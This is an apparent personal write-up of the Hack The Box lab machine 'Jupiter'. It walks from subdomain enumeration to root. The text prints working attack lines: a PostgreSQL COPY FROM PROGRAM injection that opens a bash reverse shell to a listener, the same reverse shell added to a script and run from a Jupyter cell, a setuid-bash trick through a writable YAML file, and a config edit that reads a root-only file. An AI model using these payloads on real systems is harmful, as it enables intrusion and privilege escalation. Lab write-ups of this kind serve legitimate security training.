Introduction
In this walkthrough, I will go through a medium-difficulty HTB box, Jupiter 🙂
Recon
NMAP
As usual, there are two open ports: 22 and 80.
Let's visit the site 🙂
Let's add jupiter.htb to our /etc/hosts file.
Enumeration
I used ffuf and found one subdomain, kiosk. Add kiosk.jupiter.htb to /etc/hosts as well.
Use Burp to visit kiosk.jupiter.htb and then check the HTTP history 🙂
Now send this request to Repeater 🙂
Change the rawSql param value to (the table name must be the same in both statements):
"CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'bash -c \"bash -i >& /dev/tcp/10.10.X.X/4444 0>&1\"'"
Now your modified request will look like this 🙂
Note: Don't forget to start the nc listener 🙂
And GG, you will get the revshell 🙂
Foothold
Now we have a shell as the postgres user.
In /dev/shm we can see juno's .yml file, and we have permission to write to it 🙂
Let's upgrade the shell and edit network-simulation.yml:
general:
  # stop after 10 simulated seconds
  stop_time: 10s
  # old versions of cURL use a busy loop, so to avoid spinning in this busy
  # loop indefinitely, we add a system call latency to advance the simulated
  # time when running non-blocking system calls
  model_unblocked_syscall_latency: true

network:
  graph:
    # use a built-in network graph containing
    # a single vertex with a bandwidth of 1 Gbit
    type: 1_gbit_switch

hosts:
  # a host with the hostname 'server'
  server:
    network_node_id: 0
    processes:
    - path: /usr/bin/cp
      args: /bin/bash /tmp/bash
      start_time: 3s
  # three hosts with hostnames 'client1', 'client2', and 'client3'
  client:
    network_node_id: 0
    quantity: 3
    processes:
    - path: /usr/bin/chmod
      args: u+s /tmp/bash
      start_time: 5s
After this, execute /tmp/bash -p to get a shell as juno.
But we cannot read user.txt because of the uid ………………., but there is a shadow-simulation.sh file in the home directory. Let's add the revshell to that script.
Our updated shadow-simulation.sh will look like this:
#!/bin/bash
cd /dev/shm
rm -rf /dev/shm/shadow.data
/home/juno/.local/bin/shadow /dev/shm/*.yml
cp -a /home/juno/shadow/examples/http-server/network-simulation.yml /dev/shm/
bash -i >& /dev/tcp/10.<ip>/4444 0>&1
After getting the shell as juno, we can read user.txt.
User – Jovian
If you run the id command, you will see that juno belongs to the science group, which gives access to /opt/solar-flares/.
Run grep -rie token in /opt/solar-flares/logs/ to find the right Jupyter token in the logs based on the date.
Let's use chisel to port forward 8888 and use the token for the current date 🙂
After logging in, we can execute commands from the flares.ipynb file:
# RUN this cell
import os; os.system('bash -c "bash -i >& /dev/tcp/10.10.<ip>/4444 0>&1"')
After executing it, we will get a shell as Jovian.
Root
Use sudo -l to check if there is some binary we can run as the root user.
Jovian can run /usr/local/bin/sattrack as root. We can get some info about this executable by using the strings tool and then grepping the output to see if it reads a config file:
strings /usr/local/bin/sattrack | grep -i config
Look for it in the filesystem and copy it to the /tmp folder:
find / -name config.json 2>/dev/null
cp /usr/local/share/sattrack/config.json /tmp
Now, by running the sattrack executable as root, we can see that it is able to download into the working directory any file specified in a particular section of the config.json file. Let's try to exploit this feature by requesting the root.txt we want to read.
nano config.json
Find the tlesources section and replace any of the 3 URLs with file:///root/root.txt as shown below:
"tlesources": [
    "file:///root/root.txt",
    "http://celestrak.org/NORAD/elements/n...",
    "http://celestrak.org/NORAD/elements/g..."
],
Save the new config.json and simply run sattrack as root. Enjoy the flag!
sudo /usr/local/bin/sattrack
cat /tmp/tle/root.txt
Conclusion
This box is pretty interesting and stressful at the same time; if you have a personal instance then no problem 🙂 I would rate this box 5/10.
Have a nice day!
Jay Shri Krishna ❤️❤️